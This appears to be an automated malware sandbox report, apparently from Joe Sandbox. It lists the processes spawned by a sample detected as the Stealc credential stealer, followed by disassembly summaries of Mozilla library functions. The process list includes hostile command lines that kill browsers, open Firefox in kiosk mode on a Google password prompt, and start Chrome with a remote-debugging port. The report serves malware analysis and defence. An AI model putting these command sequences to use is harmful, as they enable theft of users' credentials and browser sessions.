                                                                                                                                                                                                                                                                                      Start time:04:55:28
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                                                                                                                      Start time:04:55:30
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                                                                      Imagebase:0x2c0000
                                                                                                                                                                                                                                                                                      File size:74'240 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                                                                                                      Start time:04:55:30
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:40
                                                                                                                                                                                                                                                                                      Start time:04:55:30
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x590000
                                                                                                                                                                                                                                                                                      File size:2'741'248 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:17953500D9B941E5D42EA7121ADAADC8
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                      • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:41
                                                                                                                                                                                                                                                                                      Start time:04:55:31
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff728280000
                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                                                                                                                      Start time:04:55:31
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff728280000
                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:43
                                                                                                                                                                                                                                                                                      Start time:04:55:31
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff728280000
                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:44
                                                                                                                                                                                                                                                                                      Start time:04:55:32
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:45
                                                                                                                                                                                                                                                                                      Start time:04:55:33
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2300 -parentBuildID 20230927232528 -prefsHandle 2236 -prefMapHandle 2228 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b999cfbb-84d7-46b4-b70e-5bcaa2d69c0e} 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 23758770b10 socket
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff728280000
                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:46
                                                                                                                                                                                                                                                                                      Start time:04:55:34
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2624 --field-trial-handle=2536,i,9557238396092127338,18166861016205236946,262144 /prefetch:8
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:47
                                                                                                                                                                                                                                                                                      Start time:04:55:35
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0xe40000
                                                                                                                                                                                                                                                                                      File size:1'806'336 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:7A3B3989F1F3647DC9188A185B345D43
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002F.00000002.3202658017.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002F.00000002.3205756380.0000000000E41000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002F.00000003.3063493527.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:48
                                                                                                                                                                                                                                                                                      Start time:04:55:37
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4208 -parentBuildID 20230927232528 -prefsHandle 4232 -prefMapHandle 4228 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7cd98799-25dd-4122-971c-e59e60cd92e0} 5552 "\\.\pipe\gecko-crash-server-pipe.5552" 2376ab5bd10 rdd
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff728280000
                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:49
                                                                                                                                                                                                                                                                                      Start time:04:55:44
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\1007637001\846d486827.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x1e0000
                                                                                                                                                                                                                                                                                      File size:922'624 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:68D659F5943261E1EF96EF4BF5EE50A0
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:50
                                                                                                                                                                                                                                                                                      Start time:04:55:45
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                                                                      Imagebase:0x2c0000
                                                                                                                                                                                                                                                                                      File size:74'240 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                      Target ID:51
                                                                                                                                                                                                                                                                                      Start time:04:55:45
                                                                                                                                                                                                                                                                                      Start date:20/11/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage:0.2%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                        Signature Coverage:30.6%
                                                                                                                                                                                                                                                                                        Total number of Nodes:108
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:12
                                                                                                                                                                                                                                                                                        execution_graph 44542 6c963060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 44547 6c99ab2a 44542->44547 44546 6c9630db 44551 6c99ae0c _crt_atexit _register_onexit_function 44547->44551 44549 6c9630cd 44550 6c99b320 5 API calls ___raise_securityfailure 44549->44550 44550->44546 44551->44549 44552 6c9635a0 44553 6c9635c4 InitializeCriticalSectionAndSpinCount getenv 44552->44553 44568 6c963846 __aulldiv 44552->44568 44555 6c9638fc strcmp 44553->44555 44560 6c9635f3 __aulldiv 44553->44560 44558 6c963912 strcmp 44555->44558 44555->44560 44556 6c9635f8 QueryPerformanceFrequency 44556->44560 44557 6c9638f4 44558->44560 44559 6c963622 _strnicmp 44559->44560 44562 6c963944 _strnicmp 44559->44562 44560->44556 44560->44559 44561 6c96375c 44560->44561 44560->44562 44564 6c96395d 44560->44564 44565 6c963664 GetSystemTimeAdjustment 44560->44565 44563 6c96376a QueryPerformanceCounter EnterCriticalSection 44561->44563 44566 6c9637b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 44561->44566 44567 6c9637fc LeaveCriticalSection 44561->44567 44561->44568 44562->44560 44562->44564 44563->44561 44563->44566 44565->44560 44566->44561 44566->44567 44567->44561 44567->44568 44569 6c99b320 5 API calls ___raise_securityfailure 44568->44569 44569->44557 44570 6c97c930 GetSystemInfo VirtualAlloc 44571 6c97c9a3 GetSystemInfo 44570->44571 44572 6c97c973 44570->44572 44574 6c97c9b6 44571->44574 44575 6c97c9d0 44571->44575 44586 6c99b320 5 API calls ___raise_securityfailure 44572->44586 44574->44575 44578 6c97c9bd 44574->44578 44575->44572 44576 6c97c9d8 VirtualAlloc 44575->44576 44579 6c97c9f0 44576->44579 44580 6c97c9ec 44576->44580 44577 6c97c99b 44578->44572 44581 6c97c9c1 VirtualFree 44578->44581 44587 6c99cbe8 GetCurrentProcess TerminateProcess 44579->44587 44580->44572 44581->44572 44586->44577 44588 6c99b8ae 44589 6c99b8ba ___scrt_is_nonwritable_in_current_image 44588->44589 44590 6c99b8e3 dllmain_raw 44589->44590 44591 6c99b8de 44589->44591 44599 6c99b8c9 44589->44599 44592 6c99b8fd dllmain_crt_dispatch 44590->44592 44590->44599 44601 6c97bed0 DisableThreadLibraryCalls LoadLibraryExW 44591->44601 44592->44591 44592->44599 44594 6c99b91e 44595 6c99b94a 44594->44595 44602 6c97bed0 DisableThreadLibraryCalls LoadLibraryExW 44594->44602 44596 6c99b953 dllmain_crt_dispatch 44595->44596 44595->44599 44597 6c99b966 dllmain_raw 44596->44597 44596->44599 44597->44599 44600 6c99b936 dllmain_crt_dispatch dllmain_raw 44600->44595 44601->44594 44602->44600 44603 6c99b9c0 44604 6c99b9c9 44603->44604 44605 6c99b9ce dllmain_dispatch 44603->44605 44607 6c99bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 44604->44607 44607->44605 44608 6c99b694 44609 6c99b6a0 ___scrt_is_nonwritable_in_current_image 44608->44609 44638 6c99af2a 44609->44638 44611 6c99b6a7 44612 6c99b6d1 44611->44612 44613 6c99b796 44611->44613 44620 6c99b6ac ___scrt_is_nonwritable_in_current_image 44611->44620 44642 6c99b064 44612->44642 44655 6c99b1f7 IsProcessorFeaturePresent 44613->44655 44616 6c99b6e0 __RTC_Initialize 44616->44620 44645 6c99bf89 InitializeSListHead 44616->44645 44618 6c99b6ee ___scrt_initialize_default_local_stdio_options 44621 6c99b6f3 _initterm_e 44618->44621 44619 6c99b79d ___scrt_is_nonwritable_in_current_image 44622 6c99b828 44619->44622 44623 6c99b7d2 44619->44623 44636 6c99b7b3 ___scrt_uninitialize_crt __RTC_Initialize 44619->44636 44621->44620 44624 6c99b708 44621->44624 44625 6c99b1f7 ___scrt_fastfail 6 API calls 44622->44625 44659 6c99b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 44623->44659 44646 6c99b072 44624->44646 44628 6c99b82f 44625->44628 44633 6c99b83b 44628->44633 44634 6c99b86e dllmain_crt_process_detach 44628->44634 44629 6c99b7d7 44660 6c99bf95 __std_type_info_destroy_list 44629->44660 44631 6c99b70d 44631->44620 44632 6c99b711 _initterm 44631->44632 44632->44620 44635 6c99b860 dllmain_crt_process_attach 44633->44635 44637 6c99b840 44633->44637 44634->44637 44635->44637 44639 6c99af33 44638->44639 44661 6c99b341 IsProcessorFeaturePresent 44639->44661 44641 6c99af3f ___scrt_uninitialize_crt 44641->44611 44662 6c99af8b 44642->44662 44644 6c99b06b 44644->44616 44645->44618 44647 6c99b077 ___scrt_release_startup_lock 44646->44647 44648 6c99b07b 44647->44648 44649 6c99b082 44647->44649 44672 6c99b341 IsProcessorFeaturePresent 44648->44672 44652 6c99b087 _configure_narrow_argv 44649->44652 44651 6c99b080 44651->44631 44653 6c99b092 44652->44653 44654 6c99b095 _initialize_narrow_environment 44652->44654 44653->44631 44654->44651 44656 6c99b20c ___scrt_fastfail 44655->44656 44657 6c99b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 44656->44657 44658 6c99b302 ___scrt_fastfail 44657->44658 44658->44619 44659->44629 44660->44636 44661->44641 44663 6c99af9a 44662->44663 44664 6c99af9e 44662->44664 44663->44644 44665 6c99b028 44664->44665 44667 6c99afab ___scrt_release_startup_lock 44664->44667 44666 6c99b1f7 ___scrt_fastfail 6 API calls 44665->44666 44668 6c99b02f 44666->44668 44669 6c99afb8 _initialize_onexit_table 44667->44669 44671 6c99afd6 44667->44671 44670 6c99afc7 _initialize_onexit_table 44669->44670 44669->44671 44670->44671 44671->44644 44672->44651

                                                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                                                        Function 6C9635A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EF688,00001000), ref: 6C9635D5
                                                                                                                                                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9635E0
                                                                                                                                                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 6C9635FD
                                                                                                                                                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C96363F
                                                                                                                                                                                                                                                                                        • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C96369F
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C9636E4
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C963773
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EF688), ref: 6C96377E
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EF688), ref: 6C9637BD
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C9637C4
                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C9EF688), ref: 6C9637CB
                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C9EF688), ref: 6C963801
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 6C963883
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C963902
                                                                                                                                                                                                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C963918
                                                                                                                                                                                                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C96394C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                                                        • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                                                                                        • API String ID: 301339242-3790311718
                                                                                                                                                                                                                                                                                        • Opcode ID: c02da193ec368c5014906d882be0f33fe7e9e9d90c326e0849f2c6f2885893f2
                                                                                                                                                                                                                                                                                        • Instruction ID: 2c3a290a033bbbf252d2fa40c6f8ab3811b988b418c87b220ea80aa77cf8596f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c02da193ec368c5014906d882be0f33fe7e9e9d90c326e0849f2c6f2885893f2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BB1C471B083409BDB48DF39D84561ABBF5BFAEB04F15892EE499D7B90D770D9008B81
                                                                                                                                                                                                                                                                                        Function 6C97C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C97C947
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C97C969
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C97C9A9
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C97C9C8
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C97C9E2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2620255365.000000006C961000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C960000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620229183.000000006C960000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620420966.000000006C9DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620477917.000000006C9EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2620556289.000000006C9F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_6c960000_file.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4191843772-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 809a88a11ed0d40e29a39bde6d1eff1d348848a141352a261ece0bc38ec0e83f
                                                                                                                                                                                                                                                                                        • Instruction ID: a8d9a50efb501171aa60683ff9d3309aa07339397acbd5a4ba8b7cc4ade53ced
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 809a88a11ed0d40e29a39bde6d1eff1d348848a141352a261ece0bc38ec0e83f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F121FC32746314ABDB94AA24DC84BAE7779FF9A704F60051AF903A7B40DB70DD40C7A4
                                                                                                                                                                                                                                                                                        Function 6C963060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C963095
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9635A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C9EF688,00001000), ref: 6C9635D5
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9635A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9635E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9635A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C9635FD
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C9635A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C96363F
